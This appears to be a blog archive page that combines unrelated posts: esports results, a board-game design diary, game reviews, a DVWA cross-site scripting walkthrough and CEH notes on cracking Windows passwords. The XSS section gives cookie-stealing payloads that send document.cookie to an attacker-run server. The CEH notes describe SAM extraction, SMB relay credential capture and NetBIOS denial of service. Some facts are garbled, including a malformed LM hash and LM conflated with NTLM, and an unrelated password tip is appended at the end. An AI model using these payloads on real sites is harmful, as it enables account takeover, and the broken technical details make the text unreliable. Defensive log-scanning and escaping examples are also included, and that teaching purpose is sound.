Make 'em

IP

Tuesday, 22 September 2020

Results Of North West Online Provincial Championships Held On 29 August 2020

Anneke Lourens (Hoërskool Klerksdorp) won the female division for Clash Royale.

With MSSA's 2020 National Team Trials looming ever nearer (19 September 2020), Registered Players are furiously attempting to qualify for such Trials. Those who have already qualified are using the last few championships to perfect their craft.

Thus, MSSA's 2020 North West Online Provincial Championships held on 29 August 2020 proved to be the perfect vehicle for those who are still yet to qualify, and for those who are ironing out any of the kinks that they may have.

Even though the championship is designed to cater for athletes from the North West, Mind Sports South Africa's Board agreed to allow anyone to enter the championship in order to give all Registered Players every opportunity to qualify for Trials.

Registered Players from around the country entered, and a good time was had by all.

All Registered Players who have finished in the first three places of the Premier division are eligible for National Team Trials as long as they have at least one other championship in which they have qualified. Those that have only qualified once, have another opportunity to qualify in the form of MSSA's Free State Online Provincial Championships to be held on 5 September 2020.

The list of winners of MSSA's North West Online Provincial Championships is as follows:

Title | Name of player/team | Club | Colours awarded
Clash Royale - Premier | Willie van Rensburg | Hoërskool Klerksdorp | North West Provincial Colours
Clash Royale - Female | Anneke Lourens | Hoërskool Klerksdorp | North West Provincial Colours
Clash Royale - High School | Nico Bisschoff | Hoërskool Klerksdorp |
DotA 2 - Premier | ZAG DOTA | ZAG Academy | Provincial Colours*
PES - Premier | Rafeeq Cariem | PES SOCIETY | Western Cape Provincial Colours
PES - High School | George De Abreu | Curro Klerksdorp |
Street Fighter V - Premier | Theunis van der Merwe | Hoërskool Klerksdorp | North West Provincial Colours
Tekken 7 | Mhlengi Nkosi | NWU - Vaal | Gauteng Provincial Colours

*denotes a team in which players represented more than one province. 


Saturday, 12 September 2020

Recent Playtesting: Apotheosis (FKA Worker Learning)


Apotheosis

Since I last posted about it, I've had the opportunity to play Apotheosis (the current title for my Worker Learning game) about a dozen times. We've quickly iterated on a couple of different aspects, going from 8 starting workers (one level 1 and one level 2 of each type) to 4 (one of each type, some level 1, some level 2, depending on turn order), adding a space to recruit more workers (I'm torn on this), adding a space to pay a chunk of resources for steps on the victory tracks, and tweaking the resolution of the Recall turns and the requirements and rewards for adventures.

The current version looks something like this:

You start with a Fighter, a Cleric, a Mage, and a Thief, 0/1/2/2 of them are level 2 at the beginning if you are player 1/2/3/4 (the ones that start leveled up are dealt to you randomly, and no two players will have the same combination of upgraded starting workers).

You take turns either placing a worker and gaining the benefit of that space (your worker must be at least tied for the highest level in that area), or recalling your workers and sending them on an adventure. Most spaces are better if you are higher level, or the right class. You can gain resources, train (level up), claim adventures (so nobody can do them out from under you), buy progress on the victory tracks, turn resources into blessings, which are like wild resources, visit the Throne Room to earn royal favors, or visit the tavern to recruit more workers.

When you place a worker, you have the opportunity to play a Side Quest card for either of 2 effects (one cares about what type of worker you are placing that turn, the other doesn't). When you recall workers, you earn steps on the three victory tracks, and if you qualify, you may do an adventure to earn more steps. The adventures have 3 tiers, and the higher the tier you do, the better the rewards. After returning from an adventure, your workers level up, becoming better at their jobs.

When you do certain Side Quests, or tier 3 adventures, you get a special resource called Spoils. You can visit the throne room to turn those Spoils into Royal Favors, which you can use at certain points on the victory tracks to take a "shortcut" as well as earn a Boon (reusable power card).

Design concerns


I'm noticing a real tightness in the design -- a difficulty creating adventures that are both doable by a player who has not recruited any new workers, and also doable by a player who has. The current level cap is 6, so I wanted the adventures to require at most 6 levels of any one class. If you hire a worker, then place it, and recall once, you have 2 workers whose levels total 4 or 5 -- that's almost maxed out already! I am considering making the level cap 8 instead of 6, but d6s are easier to use in the prototype. Doing so would allow for more variety and more texture in the adventure requirements. It's also possible that not every adventure needs to be doable without recruiting another worker.

With just 4 types of worker, many of the tier 2 adventures require 3 of the 4 types. So you basically need to train up all of your workers if you want to use them at all; there's not really such a thing as choosing a class and neglecting it. I'm considering adding a 5th worker type to help with this -- it would allow the adventure requirements to be much more diverse.

Another thought is to add Split and/or Prestige classes:
Split classes would be like regular workers that count as either one or the other of two types (a Fighter/Thief would count as either a Fighter or a Thief).
Prestige classes would be like super workers that count as BOTH of two different types (Paladin = Fighter AND Cleric). For these you would probably have to discard your previous worker, therefore they BECOME a dual class worker.

Brainstorming possible solutions


Split/Prestige class workers would be pretty cool, but that sounds like expansion content to me. However, adding a 5th (maybe even a 6th?) class to make the adventures more different from each other sounds reasonable. But that idea comes with its own challenges...

In the current game, each worker type is associated with 1 resource, and 3 of them are associated with one of the victory tracks. When you recall a fighter, you advance on the Crown Imperial track, and adventures that require fighters advance you further on that track. Thieves are associated with the Prince of Thieves track, and Mages are associated with the Mastermind track. Clerics are great supporting characters -- they aren't associated with any particular track, but instead give you Blessings, which are sort of like a wild resource that can be used in various different ways.

So if another worker type is added, do we need another resource? That might be a pain, but would be doable. Another victory track? I don't necessarily think that's a good idea (though I suppose it could work). What is another iconic adventurer class anyway?

One possibility is to make this 5th class a sort of Split/Prestige class like I mentioned above. Like a Paladin, which could act as either (or both) of a fighter or a cleric. But that would simply overload the fighter related stuff. So maybe better if whatever the new class is, it doesn't advance any of the tracks, but is otherwise "better" than a normal worker (counts as all types when placing?). Or perhaps it advances the track of your choice, and has some other drawback (doesn't count as any type when placing?).

As for the level caps, one way to fix that situation is to not use dice as workers (even though it's super convenient for prototypes). Instead, perhaps a mini or standee, with a base that has a little pointer, then a dial could be attached to the bottom such that the pointer points to the number on the tile corresponding to the current level. This is a user friendly way to not have to use dice, and therefore not be as limited in their value. The level cap could easily be 8, or even 9!

Another, different possible solution to the over-leveling issue is to limit the level-ups to only 1 per recall turn. This would slow things down considerably, and it would probably matter quite a bit which one you choose to gain levels and which ones you don't. It might also make a much bigger difference between playing 1-2 workers then recalling vs playing 3 or 4 before recalling. I'd be afraid this is TOO slow, but it ought to be easy enough to test. If it works, then that would make a level cap of 6 potentially viable after all.

Resident Evil 3 Review (PS4)

Written by Alexander O. Cuaycong and Anthony L. Cuaycong


Title: Resident Evil 3
Developer: CAPCOM Co., Ltd.
Publisher: CAPCOM Co., Ltd.
Genre: Action
Price: $59.99
Also Available On: Steam, XB1



Capcom has been on a roll of late, with such notables as Monster Hunter World and Devil May Cry 5 proving to be critical and commercial hits. And with last year's Resident Evil 2 remake likewise making waves, not a few quarters have justifiably looked to Resident Evil 3's release with heightened expectations. While technically a remake of Resident Evil 3: Nemesis, the direction the Osaka-based publisher, along with creative partners K2, Redworks, and M-Two, took through its three years in development all but made it a new game. Most notably, crucial elements from its source material were removed, and designs of the characters and settings reimagined, to promote its pronounced bias for action.




In Resident Evil 3, players take control of Jill Valentine, one of the few members of the STARS team who survived the Spencer mansion incident in the Arklay Mountains. Its premise is the same as the original: She's stalked by a killing machine designed to hunt her down and silence her, and she must use her wits, her training, and what weapons she has at her disposal to stay alive in Raccoon City. In practice, it plays similarly as well: She has access to the same arsenal, and she's able to traverse the same locations. And for all the attention it pays to action in combat, it thankfully retains the oppressive atmosphere fans of the survival horror franchise have come to consider as standard.

Indeed, zombies still stalk the streets, and the series' more dangerous creatures — from the skittering Drain Deimos to the notorious Hunters — lie just out of sight. Resident Evil 3 likewise retains the dodge-roll function, Nemesis' constant interference in Jill's plans, and even the Carlos segments. At first glance, Capcom has seemingly both made a faithful remake and updated facets for the contemporary crowd. Which does make the whole experience worthwhile. It's visually stunning, thematically engaging, and technically impressive. And, by all accounts, it ticks off the requisite boxes of a game veterans of, and newcomers to, the genre will enjoy.




That said, players who remember the original may have some qualms about the changes Resident Evil 3 makes. For example, the Carlos portions are much longer in nature and duration. Meanwhile, others in the original — among them the graveyard and the clock tower segments — have been reduced or cut out entirely; in their places are old locations that have been expanded. Another notable change: The Gravedigger boss in the graveyard portion has been excised, and a completely new boss, with a unique set of gimmicks, has been put in its place.

The changes aside, Resident Evil 3 has a few glaring problems, most specifically in regard to its length and replay value. The first run figures to take upwards of seven hours to complete, but successive play-throughs will be shorter. While not a problem in and of itself, it becomes cause for concern given the absence of "The Mercenaries — Operation: Mad Jackal," the much-lauded mini-game in the original. True, it tries to fill the gap by having two extra difficulty settings in Nightmare and Inferno. Then again, they succeed in little more than ramping up the challenge; they do little to encourage players to finish the game more than a few times. Which, all things considered, may leave those who enjoy extra modes and extra content wanting more.




Still, Resident Evil 3 is worth playing through. It may not be as good a remake as Resident Evil 2, but it nonetheless pulls its weight as a worthy update to a highly regarded title.



THE GOOD
  • A grounded and interesting take on Jill Valentine
  • Graphically impressive while still playing smoothly
  • Able to consistently provide tension and dread even as it ramps up the stakes
  • Additional difficulty settings (with two of four initially locked until completion)

THE BAD
  • Missing "The Mercenaries — Operation: Mad Jackal" mode
  • Changes sequences from the original, making it feel more like a reimagining than a remake


RATING: 9/10

Thursday, 3 September 2020

Into The Tiny

Tiny Epic Galaxies delivers on its promise: it has the feel of an epic exploration game, but it comes in a small box and doesn't take all day to play. Now, don't get me wrong, it isn't Xia or Star Wars Rebellion, but it still creates a sense of mighty space empires growing stronger as they explore and conquer new territory.

It's a dice placement game, a growing sub-genre of worker placement where players roll dice to determine what actions they can do in a given round. The actions here are moving a space ship between planets, acquiring one of the game's two resources (energy or culture), using either diplomacy or economy to advance colonization efforts on a planet, or utilizing an established colony's special ability for a game effect.

Players start with 4 dice and two space ships, and compete to exploit the resources of a row of planet cards at the center of the table. Landing on a planet conveys a one-time use of that planet's special ability. Orbiting the planet and taking the time to colonize it takes longer but adds the planet to your pool of colonies, meaning only you may use its special ability. Additionally, each planet provides either energy or culture, so spreading out your ships to take the best advantage of the acquire resource action is critical to having the resources you need to upgrade your empire, which gets you more ships and dice to use on later turns.

As with all the games in the Tiny Epic series, this one doesn't really offer anything truly original, but that's not the point. The accomplishment is that it offers something similar to what you normally only get from much larger and more time-consuming games. The amount of game that designer Scott Almes is able to get out of a minimum of components is astonishing.

Rating: 4 (out of 5). There's a lot more going on in this game than can be expected from a 5" x 7" box, that's for sure.

Sunday, 30 August 2020

Learning Web Pentesting With DVWA Part 4: XSS (Cross Site Scripting)

In this article we are going to solve the Cross-Site Scripting (XSS) challenges of the DVWA app. Let's start by understanding what XSS attacks are. OWASP defines XSS as: "Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.
An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page."
XSS attacks are usually used to steal user cookies, which let attackers control the victim's account, or to deface a website. The severity of this attack depends on what type of account is compromised by the attacker. If it is a normal user account the impact may be limited, but if it is an admin account it could lead to compromise of the whole app or even the servers.

DOM, Sources, and Sinks:

DVWA has three types of XSS challenges. We'll describe each as we go through them in this article. But before we solve these challenges we need to understand a few things about the browser: what the Document Object Model (DOM) is, and what sources and sinks are. The DOM is the browser's hierarchical representation of the elements in a web page. Wikipedia defines the DOM as "a cross-platform and language-independent interface that treats an XML or HTML document as a tree structure wherein each node is an object representing a part of the document. The DOM represents a document with a logical tree". A source can be described simply as input that a user supplies. A sink can be defined as a "potentially dangerous JavaScript function or DOM object that can cause undesirable effects if attacker-controlled data is passed to it". The JavaScript function eval() is an example of a sink.

DOM Based XSS:

Now let's solve our first XSS challenge, which is a DOM based XSS challenge. DOM based XSS occurs when data from a source is passed to a sink without proper validation. An attacker passes specially crafted input to the sink to cause undesirable effects in the web app.
PortSwigger puts it this way: "Fundamentally, DOM-based vulnerabilities arise when a website passes data from a source to a sink, which then handles the data in an unsafe way in the context of the client's session."
On the DVWA app click on XSS (DOM); you will be presented with a page like this:
Keep an eye on the URL of the page. Now select a language and click the Select button. The URL should now look like this:
http://localhost:9000/vulnerabilities/xss_d/?default=English
We are making a GET request to the server and sending a default parameter with the language that we selected. This default parameter is the source, and the page passes this source to the sink directly without any validation. Now let's try to exploit this vulnerability by changing the URL to this:
http://localhost:9000/vulnerabilities/xss_d/?default=<script>alert('XSS')</script>
When we hit Enter after modifying the URL in the browser's address bar we should see an alert box pop up with XSS written on it. This proves that the app is passing data from source to sink without any validation. Now it's time to steal some cookies. Open another terminal or tab and set up a simple HTTP server using python3 like this:
python3 -m http.server
By default the Python HTTP server listens on port 8000. Now let's modify the URL to steal the session cookies:
http://localhost:9000/vulnerabilities/xss_d/?default=<script>new Image().src="http://localhost:8000/?c="+document.cookie;</script>
The payload we have used here is from the GitHub repository PayloadsAllTheThings, an awesome collection of payloads. In this script we define a new image whose source is our Python HTTP server, and we append the user's cookies to that request with the help of the document.cookie property. As can be seen in the image, we get a request from the page as soon as it loads with our XSS payload, and we can see the user's cookies being passed with the request. That's it, we have stolen the user's cookies.
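From the defender's side, the GET requests that carry these payloads end up in the web server's access log, URL-encoded. The following Python script is an added example, not part of the original walkthrough or of DVWA: it scans constructed Combined Log Format lines for the indicators used in this article (a script tag, an on* event handler, document.cookie, a javascript: URI) after URL-decoding the query string. The log lines, the IP addresses and timestamps, and the indicator list are assumptions made for illustration.

```python
import re
from urllib.parse import unquote, unquote_plus

# Constructed sample access-log lines (Combined Log Format) for a DVWA-style
# host. The requests mirror the walkthrough: a normal language selection,
# the alert probe, the cookie-exfiltration payload, a normal name, and the
# img/onerror payload against the reflected page. IPs and timestamps are made up.
SAMPLE_LOG = """\
127.0.0.1 - - [30/Aug/2020:10:00:01 +0000] "GET /vulnerabilities/xss_d/?default=English HTTP/1.1" 200 1832 "-" "Mozilla/5.0"
127.0.0.1 - - [30/Aug/2020:10:00:09 +0000] "GET /vulnerabilities/xss_d/?default=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E HTTP/1.1" 200 1832 "-" "Mozilla/5.0"
127.0.0.1 - - [30/Aug/2020:10:01:15 +0000] "GET /vulnerabilities/xss_d/?default=%3Cscript%3Enew%20Image().src%3D%22http%3A//localhost%3A8000/%3Fc%3D%22%2Bdocument.cookie%3B%3C/script%3E HTTP/1.1" 200 1832 "-" "Mozilla/5.0"
127.0.0.1 - - [30/Aug/2020:10:02:30 +0000] "GET /vulnerabilities/xss_r/?name=Alice HTTP/1.1" 200 1790 "-" "Mozilla/5.0"
127.0.0.1 - - [30/Aug/2020:10:03:02 +0000] "GET /vulnerabilities/xss_r/?name=%3Cimg%20src%3Dx%20onerror%3Dthis.src%3D%22http%3A//localhost%3A8000/%3Fc%3D%22%2Bdocument.cookie%20/%3E HTTP/1.1" 200 1790 "-" "Mozilla/5.0"
"""

# Combined Log Format: client IP, identd, user, [timestamp], "METHOD path PROTO", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Heuristic indicators, applied to the URL-decoded, lower-cased query string.
# They will also flag legitimate text that happens to contain e.g. "online=",
# so treat hits as leads for review rather than proof of an attack.
INDICATORS = {
    "script_tag": re.compile(r"<\s*script"),
    "event_handler": re.compile(r"\bon[a-z]+\s*="),
    "cookie_access": re.compile(r"document\.cookie"),
    "javascript_uri": re.compile(r"javascript\s*:"),
}


def decode_query(path):
    """Return the query string of a request path, URL-decoded twice (to catch
    double-encoded payloads) and lower-cased; '' when there is no query."""
    if "?" not in path:
        return ""
    query = path.split("?", 1)[1]
    return unquote(unquote_plus(query)).lower()


def scan_access_log(text):
    """Return one finding per log line whose query string carries an indicator."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = decode_query(m.group("path"))
        hits = sorted(name for name, rx in INDICATORS.items() if rx.search(query))
        if hits:
            findings.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "path": m.group("path").split("?", 1)[0],
                "indicators": hits,
            })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['path']} -> {', '.join(f['indicators'])}")
```

On the constructed log the scan flags three of the five requests: the alert probe (script tag), the DOM payload (script tag plus document.cookie) and the reflected img payload (event handler plus document.cookie). Payloads sent in a POST body, as on the stored page, do not appear in the request line, so for those the same checks belong in application logging or a WAF that sees the body.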

Reflected XSS:

Another type of XSS attack is called a Reflected XSS attack. OWASP describes Reflected XSS as those attacks "where the injected script is reflected off the web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request."
To perform this type of attack, click on the XSS (Reflected) navigation link in DVWA. After the page opens you are presented with an input field that asks for your name.
Now just type your name and click the Submit button. You'll see a response from the server which contains the input that you provided. This response from the server containing the user input is called a reflection. What if we submit some JavaScript code in the input field? Let's try this out:
<script>alert("XSS")</script>
After typing the above JavaScript code in the input field, click Submit. As soon as you hit Submit you'll see a pop-up on the web page with XSS written on it. In order to steal some cookies you know what to do. Let's use another payload from PayloadsAllTheThings. Enter the code below in the input field and click Submit:
<img src=x onerror=this.src="http://localhost:8000/?c="+document.cookie />
Here we are using the img HTML tag and its onerror attribute to load our request. Since the image x is not present on the server, the onerror JavaScript handler runs and performs a GET request to our Python HTTP server with the user's cookies, just like we did before.
Referencing OWASP again: "Reflected attacks are delivered to victims via another route, such as in an e-mail message, or on some other website. When a user is tricked into clicking on a malicious link, submitting a specially crafted form, or even just browsing to a malicious site, the injected code travels to the vulnerable web site, which reflects the attack back to the user's browser. The browser then executes the code because it came from a "trusted" server. Reflected XSS is also sometimes referred to as Non-Persistent or Type-II XSS."
Obviously you'll need your super awesome social engineering skills to successfully execute this type of attack. But yeah, we are the good guys; why would we do so?

Stored XSS:

The last type of XSS attack that we are going to see is the Stored XSS attack. OWASP describes Stored XSS attacks as those attacks "where the injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. Stored XSS is also sometimes referred to as Persistent or Type-I XSS."
To perform this type of XSS attack, click on the XSS (Stored) navigation link in DVWA. As the page loads, we see a Guestbook signing form.
In this form we have to provide our name and a message. This information (name and message) is stored in a database. Let's go for a test spin. Type your name and some message in the input fields and then click Sign Guestbook. You should see your name and message displayed below the form. What makes stored XSS different from reflected XSS is that the information is stored in the database and hence persists. When you performed the reflected XSS attack, the information you provided in the input field was not stored anywhere beyond that one request. In a stored XSS attack, however, our information is stored in the database and we can see it every time we visit that page. If you navigate to some other page and then navigate back to the XSS (Stored) page you'll see that your name and message are still there. Now let's try to submit some JavaScript in the message box. Enter a name in the name field and enter this script in the message box:
<script>alert('XSS')</script>
When we click the Sign Guestbook button, we get an XSS alert.
Now when you try to write your cookie stealing payload you notice you cannot fit it in the box, as the maximum input length for the textarea is set to 50. To get rid of this restriction, right-click on the textarea and click Inspect. Change or delete the maxlength="50" attribute in the markup:
<textarea name="mtxMessage" cols="50" rows="3" maxlength="50"></textarea>
to something like this:
<textarea name="mtxMessage" cols="50" rows="3"></textarea>
And now use your payload to steal some cookies:
<img src=x onerror=this.src="http://localhost:8000/?c="+document.cookie />
Every time a user visits this page you'll get his/her cookies (Sweet...). You don't need to send any links or exercise your super powerful social engineering skills to get user cookies. Your script is in the database and will be loaded every time a user visits this vulnerable page.
That's it for today, see you next time.
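The fix for both the reflected and the stored case is the same: encode on output, and do not treat the browser-side maxlength as a control, since the inspector step above shows it can simply be deleted. The following Python is an added example that serves both sections; it is not DVWA's PHP or the author's code. The Guestbook class, the field limits and the session cookie name are assumptions made for illustration. It stores entries, enforces the 50-character limit on the server, renders the entries both the vulnerable way and through html.escape, and shows a Set-Cookie header whose HttpOnly flag keeps the session ID out of document.cookie.

```python
import html

MAX_NAME = 30        # assumed limit for this example
MAX_MESSAGE = 50     # matches the textarea's maxlength="50", but enforced server-side


class ValidationError(ValueError):
    pass


def validate_field(value, max_len, label):
    """Reject empty or over-long input before it is stored. The client-side
    maxlength attribute is only a convenience; this check is the real one."""
    value = value.strip()
    if not value:
        raise ValidationError(f"{label} must not be empty")
    if len(value) > max_len:
        raise ValidationError(f"{label} exceeds {max_len} characters")
    return value


class Guestbook:
    """In-memory stand-in for the database table the DVWA page writes to."""

    def __init__(self):
        self.entries = []

    def sign(self, name, message):
        self.entries.append((validate_field(name, MAX_NAME, "name"),
                             validate_field(message, MAX_MESSAGE, "message")))
        return len(self.entries)


def render_guestbook_vulnerable(entries):
    """Stored text concatenated straight into HTML: whatever was stored,
    including a script tag or an onerror handler, reaches every visitor."""
    return "".join(f"<div>Name: {n}<br />Message: {m}</div>" for n, m in entries)


def render_guestbook_hardened(entries):
    """Escape on output: each stored string passes through html.escape, so
    '<' becomes '&lt;' and quotes become entities; the browser shows text."""
    return "".join(
        f"<div>Name: {html.escape(n, quote=True)}<br />Message: {html.escape(m, quote=True)}</div>"
        for n, m in entries
    )


def render_reflected(name):
    """Hardened counterpart of the reflected page: the echoed name is escaped."""
    return f"<pre>Hello {html.escape(name, quote=True)}</pre>"


def session_cookie_header(session_id):
    """Set-Cookie value for the session. HttpOnly keeps it out of
    document.cookie, so the exfiltration payloads above would send an empty
    string; Secure and SameSite limit where it travels."""
    return f"PHPSESSID={session_id}; Path=/; HttpOnly; Secure; SameSite=Lax"


# Constructed inputs: the two payloads used in the walkthrough.
SHORT_PAYLOAD = "<script>alert('XSS')</script>"
LONG_PAYLOAD = '<img src=x onerror=this.src="http://localhost:8000/?c="+document.cookie />'


def demo():
    """Store a benign entry and the short payload, try the long payload, and
    render the stored entries both ways.
    Returns (rejection reason, vulnerable HTML, hardened HTML)."""
    gb = Guestbook()
    gb.sign("Alice", "hello")
    gb.sign("Mallory", SHORT_PAYLOAD)       # 29 chars: passes the length check
    rejected = ""
    try:
        gb.sign("Mallory", LONG_PAYLOAD)    # 74 chars: rejected server-side
    except ValidationError as err:
        rejected = str(err)
    return rejected, render_guestbook_vulnerable(gb.entries), render_guestbook_hardened(gb.entries)


if __name__ == "__main__":
    rejected, vuln, safe = demo()
    print("rejected:  ", rejected)
    print("vulnerable:", vuln)
    print("hardened:  ", safe)
    print("cookie:    ", session_cookie_header("example-session-id"))
```

Note that the length check is a secondary control: the short payload passes it and is still stored, which is exactly why the escaping happens at render time, where it neutralises anything already in the database. html.escape is the right encoder for HTML body and quoted attribute context; data that ends up inside a script block, an event handler or a URL needs that context's own encoding instead.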

References:

  1. DOM-based vulnerabilities: https://portswigger.net/web-security/dom-based
  2. DOM-based XSS: https://portswigger.net/web-security/cross-site-scripting/dom-based
  3. Document Object Model: https://en.wikipedia.org/wiki/Document_Object_Model
  4. Payload All the Things: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection
  5. Cross Site Scripting (XSS): https://owasp.org/www-community/attacks/xss/


CEH: System Hacking, Cracking A Password, Understanding The LAN Manager Hash, NetBIOS DoS Attacks


Passwords are the key piece of information required to access a system, so the first step in accessing a system is knowing how to crack the password of the target system. It is a fact that users select passwords that are easy to guess. Once a password is guessed or cracked, it can be the launching point for escalating privileges, executing applications, hiding files, and covering tracks. If guessing a password fails, passwords may be cracked manually or with automated tools using a dictionary or brute-force method.

Cracking a Password

Passwords are stored in the Security Accounts Manager (SAM) file on a Windows system and in a password shadow file on a Linux system.

Manual password cracking involves attempting to log on with different passwords. The hacker follows these steps:
  1. Find a valid user account (such as Administrator or Guest).
  2. Create a list of possible passwords.
  3. Rank the passwords from high to low probability.
  4. Key in each password.
  5. Try again until a successful password is found.
A hacker can also create a script file that tries each password in a list. This is still considered manual cracking, but it's time consuming and not usually effective.

A more efficient way of cracking a password is to gain access to the password file on a system. Most systems hash (one-way encrypt) a password for storage on a system. During the logon process, the password entered by the user is hashed using the same algorithm and then compared to the hashed passwords stored in the file. A hacker can attempt to gain access to the hashing algorithm stored on the server instead of trying to guess or otherwise identify the password. If the hacker is successful, they can decrypt the passwords stored on the server.

Understanding the LAN Manager Hash

Windows 2000 uses NT LAN Manager (NTLM) hashing to secure passwords in transit on the network. Depending on the password, NTLM hashing can be weak and easy to break. For example, let's say that the password is 123456abcdef. When this password is encrypted with the NTLM algorithm, it's first converted to all uppercase: 123456ABCDEF. The password is padded with null (blank) characters to make it 14 characters long: 123456ABCDEF__. Before the password is encrypted, the 14-character string is split in half: 123456A and BCDEF__. Each string is individually encrypted, and the results are concatenated:

123456A = 6BF11E04AFAB197F
BCDEF__ = F1E9FFDCC75575B15

The hash is 6BF11E04AFAB197FF1E9FFDCC75575B15 .
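The preprocessing above is why the LM hash leaks information about password length: a password of seven characters or fewer leaves the second half entirely null, and the hash of a null half is the fixed value AAD3B435B51404EE, so the second half of the stored hash reveals short passwords at a glance. The following Python is an added example, not part of the CEH material: it reproduces the uppercase/pad/split step (the DES step is deliberately left out) and audits a constructed pwdump-style export for accounts that still have an LM hash stored, that have a short password, or that have an empty password. The usernames, and every hash value other than the well-known empty-password constants, are placeholders.

```python
from dataclasses import dataclass

# Well-known constants (not placeholders): the LM hash of an empty password is
# the 8-byte empty-half value repeated; the NT hash of an empty password.
EMPTY_LM_HALF = "AAD3B435B51404EE"
EMPTY_LM_HASH = EMPTY_LM_HALF * 2
EMPTY_NT_HASH = "31D6CFE0D16AE931B73C59D7E0C089C0"


def lm_halves(password):
    """LM preprocessing as described above: uppercase, truncate/pad with NULs
    to 14 bytes, split into two 7-byte halves. The DES step that turns each
    half into 8 bytes of hash is deliberately not implemented here."""
    raw = password.upper().encode("latin-1", "replace")[:14]
    raw = raw.ljust(14, b"\x00")
    return raw[:7], raw[7:]


@dataclass
class LmFinding:
    user: str
    lm_stored: bool        # an LM hash other than the empty constant is stored
    short_password: bool   # second half equals the empty constant -> 7 chars or fewer
    empty_password: bool   # NT hash is the empty-password constant


def _is_hex32(value):
    return len(value) == 32 and all(c in "0123456789ABCDEF" for c in value)


def audit_pwdump_line(line):
    """Parse one pwdump-format line 'user:rid:lmhash:nthash:::' and report
    LM-related weaknesses. Anything that is not a 32-digit hex LM hash
    (some tools print 'NO PASSWORD*****' there) is treated as no LM hash."""
    parts = line.strip().split(":")
    if len(parts) < 4:
        raise ValueError(f"not a pwdump line: {line!r}")
    user, lm, nt = parts[0], parts[2].upper(), parts[3].upper()
    lm_stored = _is_hex32(lm) and lm != EMPTY_LM_HASH
    return LmFinding(
        user=user,
        lm_stored=lm_stored,
        short_password=lm_stored and lm[16:] == EMPTY_LM_HALF,
        empty_password=nt == EMPTY_NT_HASH,
    )


def audit_pwdump(text):
    """Audit every non-empty, non-comment line of a pwdump-style export."""
    return [audit_pwdump_line(ln) for ln in text.splitlines()
            if ln.strip() and not ln.startswith("#")]


# Constructed sample export. The usernames are placeholders and every hash
# other than the empty-password constants is a placeholder, not a real hash.
SAMPLE_DUMP = """\
Administrator:500:0123456789ABCDEF0123456789ABCDEF:FEDCBA9876543210FEDCBA9876543210:::
svc_backup:1001:0123456789ABCDEFAAD3B435B51404EE:FEDCBA9876543210FEDCBA9876543210:::
Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::
alice:1002:AAD3B435B51404EEAAD3B435B51404EE:FEDCBA9876543210FEDCBA9876543210:::
"""

if __name__ == "__main__":
    print("halves for 123456abcdef:", lm_halves("123456abcdef"))
    for f in audit_pwdump(SAMPLE_DUMP):
        flags = [n for n in ("lm_stored", "short_password", "empty_password") if getattr(f, n)]
        print(f"{f.user:15s} {', '.join(flags) or 'ok'}")
```

In the sample, Administrator still has an LM hash stored, svc_backup has an LM hash whose second half is the empty constant (a password of at most seven characters), Guest has an empty password, and alice has only an NT hash. An account whose LM field is the empty constant while the NT hash is set, like alice, is what you want to see everywhere: LM storage disabled, so the case-folded, 7-character halves never exist.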

Cracking Windows 2000 Passwords

The SAM file in Windows contains the usernames and hashed passwords. It's located in the Windows\system32\config directory. The file is locked when the operating system is running so that a hacker can't attempt to copy the file while the machine is booted to Windows.

One option for copying the SAM file is to boot to an alternate operating system such as DOS or Linux with a boot CD. Alternately, the file can be copied from the repair directory. If a system administrator uses the RDISK feature of Windows to back up the system, then a compressed copy of the SAM file called SAM._ is created in C:\windows\repair . To expand this file, use the following command at the command prompt:

C:\>expand sam._ sam

After the file is uncompressed, a dictionary, hybrid, or brute-force attack can be run against the SAM file using a tool like L0phtCrack. A similar tool to L0phtcrack is Ophcrack.

Download and install ophcrack from http://ophcrack.sourceforge.net/

Redirecting the SMB Logon to the Attacker

Another way to discover passwords on a network is to redirect the Server Message Block (SMB) logon to an attacker's computer so that the passwords are sent to the hacker. In order to do this, the hacker must sniff the NTLM responses from the authentication server and trick the victim into attempting Windows authentication with the attacker's computer.

A common technique is to send the victim an email message with an embedded link to a fraudulent SMB server. When the link is clicked, the user unwittingly sends their credentials over the network.

SMBRelay

An SMB server that captures usernames and password hashes from incoming SMB traffic. SMBRelay can also perform man-in-the-middle (MITM) attacks.

SMBRelay2

Similar to SMBRelay but uses NetBIOS names instead of IP addresses to capture usernames and passwords.

pwdump2

A program that extracts the password hashes from a SAM file on a Windows system. The extracted password hashes can then be run through L0phtCrack to break the passwords.

Samdump

Another program that extracts NTLM hashed passwords from a SAM file.

C2MYAZZ

A spyware program that makes Windows clients send their passwords as clear text. It displays usernames and their passwords as users attach to server resources.

NetBIOS DoS Attacks

A NetBIOS denial-of-service (DoS) attack sends a NetBIOS Name Release message to the NetBIOS Name Service on a target Windows system and forces the system to place its name in conflict so that the name can no longer be used. This essentially blocks the client from participating in the NetBIOS network and creates a network DoS for that system.
  1. Start with a memorable phrase, such as "Maryhadalittlelamb"
  2. Change every other character to uppercase, resulting in "MaRyHaDaLiTtLeLaMb"
  3. Change a to @ and i to 1 to yield "M@RyH@D@L1TtLeL@Mb"
  4. Drop every other pair to result in a secure repeatable password or "M@H@L1LeMb"

Now you have a password that meets all the requirements, yet can be "remade" if necessary.
